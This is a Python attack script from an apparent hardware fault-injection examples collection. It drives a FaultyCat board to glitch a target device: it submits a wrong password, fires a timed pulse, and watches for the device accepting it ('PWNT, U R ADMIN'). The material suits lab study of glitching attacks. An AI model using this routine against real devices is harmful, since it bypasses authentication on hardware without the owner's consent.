# Hardware / FaultInjection / examples / FaultyCat / 03_password_check / attack.py
# 0xRoM on 11 Feb, 7 KB, initial commit
import sys
import time
import pexpect  # Required to handle screen sessions
import threading
from Modules import Worker

# Serial port handed to the FaultyWorker by faulty().
DEFAULT_COMPORT = "/dev/ttyACM0"
# Name of the GNU screen session attached to with `screen -x` in
# initialize_child(). Replace this with the actual screen session name.
SCREEN_NAME = "ttyUSB0_screen"

# Single FaultyWorker instance shared by every function in this script;
# it provides the board UART and the board command set.
faulty_worker = Worker.FaultyWorker()
# Last verdict recorded by read_screen_output(); stays None until a line
# containing "incorrect!" is seen, then holds 'incorrect'.
device_response = None
# pexpect handle for the attached screen session; set by initialize_child().
child = None

def initialize_child():
    """Attach to the configured screen session and keep the handle in ``child``.

    The session named by ``SCREEN_NAME`` is joined with ``screen -x`` through
    pexpect, using UTF-8 text mode so reads return ``str``.
    """
    global child
    attach_command = f'screen -x {SCREEN_NAME}'
    child = pexpect.spawn(attach_command, encoding='utf-8')
    # Listing TIMEOUT as the expected pattern makes expect() wait out the one
    # second instead of raising; the intent is to consume whatever output the
    # session had already produced before the attack starts.
    child.expect(pexpect.TIMEOUT, timeout=1)

def send_test_message_and_read_response():
    """Send 'ping' through the screen session and report whether 'pong' came back.

    Writes ``ping`` to the global ``child`` session, waits half a second and
    then reads up to 1024 characters of new output (2 second read timeout).
    Progress is reported on stdout using carriage-return status lines.

    Returns:
        bool: True if the text that was read contains ``pong``; False if
        something else was read or the read timed out.
    """
    # Send 'ping' to the screen session
    child.sendline("ping")
    sys.stdout.write("\rSent 'ping' to screen session.")
    sys.stdout.flush()

    # Give the target time to process the command before reading
    time.sleep(0.5)

    try:
        response = child.read_nonblocking(size=1024, timeout=2)
    except pexpect.exceptions.TIMEOUT:
        sys.stdout.write("\rNo response received from the screen session (timeout).")
        sys.stdout.flush()
        return False

    got_pong = "pong" in response
    if got_pong:
        sys.stdout.write("\rReceived 'pong' response.")
    else:
        sys.stdout.write(f"\rReceived unexpected response: {response}")
    # Flush on both outcomes; previously the 'pong' path returned before
    # reaching the flush, leaving its status message buffered.
    sys.stdout.flush()
    return got_pong

def read_screen_output():
    """Read the screen session line by line until the device gives a verdict.

    Output from the global ``child`` session is accumulated and examined one
    complete line at a time:

    * a line containing ``incorrect!`` stores ``'incorrect'`` in the global
      ``device_response`` and returns;
    * a line containing ``correct`` that is not merely part of the word
      ``incorrect`` is treated as success: the board is disarmed, its UART
      is closed and the whole program terminates with status 0;
    * any other line is reported as unexpected and reading continues.

    The function also returns when no new output arrives within 2 seconds or
    when reading fails; both cases are reported on stdout, not raised.
    """
    global device_response
    import os  # local import: only needed to exit from a worker thread

    buffer = ""  # Holds received text until a full line is available

    try:
        while True:
            buffer += child.read_nonblocking(size=1024, timeout=2)

            # Process every complete line currently in the buffer
            while "\n" in buffer:
                line, buffer = buffer.split("\n", 1)
                line = line.strip()

                if "incorrect!" in line:
                    device_response = 'incorrect'
                    return

                # "correct" is a substring of "incorrect", so remove every
                # "incorrect" first; otherwise e.g. an echoed
                # "incorrectPassword" would be reported as a success.
                if "correct" in line.replace("incorrect", ""):
                    sys.stdout.write("\nReceived 'correct' response.\n PWNT, U R ADMIN\n Disarming the device and exiting...\n")
                    sys.stdout.flush()

                    # Disarm the board
                    faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
                    faulty_worker.board_uart.close()

                    # Exit the program. SystemExit raised outside the main
                    # thread only ends that thread, so in that case terminate
                    # the process directly (stdout was flushed above).
                    if threading.current_thread() is threading.main_thread():
                        sys.exit(0)
                    os._exit(0)

                sys.stdout.write(f"\rReceived unexpected response: {line}")
                sys.stdout.flush()

    except pexpect.exceptions.TIMEOUT:
        sys.stdout.write("\rNo response received from the screen session (timeout).")
        sys.stdout.flush()
    except Exception as e:
        sys.stdout.write(f"\rError reading from screen session: {e}")
        sys.stdout.flush()

def send_pulse_and_check_response():
    """Submit a wrong password, fire one glitch pulse, then read the verdict.

    The sequence is: send ``incorrectPassword`` to the screen session, wait
    0.35 s, send the PULSE command to the board, then call
    ``read_screen_output()`` to consume the device's reply.

    ``read_screen_output()`` is called directly rather than on a helper
    thread: the thread used to be joined immediately (so nothing ran in
    parallel) and a ``sys.exit()`` raised inside it only ended that thread
    instead of the program.

    Returns:
        bool: False in every case in which the function returns. A failure
        while talking to the session or the board is reported on stdout and
        also yields False. A successful glitch does not return at all,
        because ``read_screen_output()`` exits the program.
    """
    try:
        # Send 'incorrectPassword' command to the screen session
        sys.stdout.write("\rSending 'incorrectPassword' to screen session.")
        sys.stdout.flush()
        child.sendline("incorrectPassword")

        # Delay between submitting the password and firing the pulse
        time.sleep(0.35)

        # Send 'pulse' command (the glitch trigger)
        faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_PULSE.value.encode("utf-8"))
        sys.stdout.write("\rSent pulse...")
        sys.stdout.flush()

        # Read the device's reply on this thread so SystemExit propagates
        read_screen_output()

    except Exception as e:
        sys.stdout.write(f"\rError interacting with screen session during pulse: {e}")
        sys.stdout.flush()
        return False

    return False

def start_faulty_attack():
    """Arm the FaultyCat, run the ping/glitch rounds, and always disarm afterwards.

    Steps:
      1. Attach to the screen session (``initialize_child``).
      2. Open the board UART, send DISARM, wait one second, send ARM.
      3. Up to five rounds: ping the target and, if it answers, make up to
         three glitch attempts with ``send_pulse_and_check_response``.
      4. Disarm the board, close its UART and close the screen session.

    Step 4 runs in ``finally`` so the board is not left armed when a round
    raises or the user interrupts the script. Errors derived from
    ``Exception`` are reported on stdout rather than raised.
    """
    board_open = False  # True once the UART is open, i.e. a disarm is required
    try:
        # Initialize the child process for screen session
        initialize_child()

        uart = faulty_worker.board_uart
        commands = faulty_worker.board_configurator.board_commands

        # Open FaultyCat connection
        uart.open()
        board_open = True
        time.sleep(0.1)
        sys.stdout.write("\rBoard connected.\n")
        sys.stdout.flush()

        # Arming the board (disarm first, then arm after a short pause)
        sys.stdout.write("\r[*] ARMING BOARD, BE CAREFUL!\n")
        sys.stdout.flush()
        uart.send(commands.COMMAND_DISARM.value.encode("utf-8"))
        time.sleep(1)
        uart.send(commands.COMMAND_ARM.value.encode("utf-8"))

        sys.stdout.write("\r[*] ARMED BOARD.\n")
        sys.stdout.flush()
        time.sleep(1)

        # Sending pulses and checking responses in a loop (up to 5 times)
        max_iterations = 5
        for i in range(max_iterations):
            sys.stdout.write(f"\rLoop {i+1}/{max_iterations}: Sending pulse and checking response.\n")
            sys.stdout.flush()

            # Only glitch when the target is alive and answers the ping
            if send_test_message_and_read_response():
                max_iterations_2 = 3
                for _ in range(max_iterations_2):
                    if send_pulse_and_check_response():
                        break  # Stop early if a success is reported

            # Small delay before next iteration
            time.sleep(1)
    except SystemExit:
        # The only sys.exit() in this script is in read_screen_output(), which
        # disarms the board and closes its UART before exiting, so skip the
        # second disarm below.
        board_open = False
        raise
    except Exception as e:
        sys.stdout.write(f"\rError: {e}\n")
        sys.stdout.flush()
    finally:
        if board_open:
            sys.stdout.write("\rDISARMING BOARD.                          \n")
            sys.stdout.flush()
            try:
                uart.send(commands.COMMAND_DISARM.value.encode("utf-8"))
                uart.close()
                sys.stdout.write("\rBOARD DISARMED.\n")
            except Exception as e:
                # Best effort: report the failure but still clean up below
                sys.stdout.write(f"\rError: {e}\n")
            sys.stdout.flush()
        # Make sure to clean up the child process
        if child is not None:
            child.close()

def faulty(comport=None):
    """Configure the FaultyCat on a serial port and run the attack.

    Args:
        comport: Serial port of the FaultyCat board. When omitted (None),
            ``DEFAULT_COMPORT`` is used, which matches the previous
            behaviour of calling ``faulty()`` without arguments.

    Returns:
        None. If the serial connection cannot be validated, an error is
        printed and the attack is not started.
    """
    if comport is None:
        comport = DEFAULT_COMPORT

    print("Configuring the FaultyCat...")
    print(f"Using serial port: {comport}")

    # Set the serial port
    faulty_worker.set_serial_port(comport)

    # Validate the serial connection before touching the board
    if not faulty_worker.validate_serial_connection():
        print(f"Error: Could not establish connection on: {comport}")
        return

    # Start the faulty attack (send pulse)
    start_faulty_attack()

# Script entry point: announce start-up, then configure the board and run
# the attack via faulty().
if __name__ == "__main__":
    print("Starting FaultyCat...")
    faulty()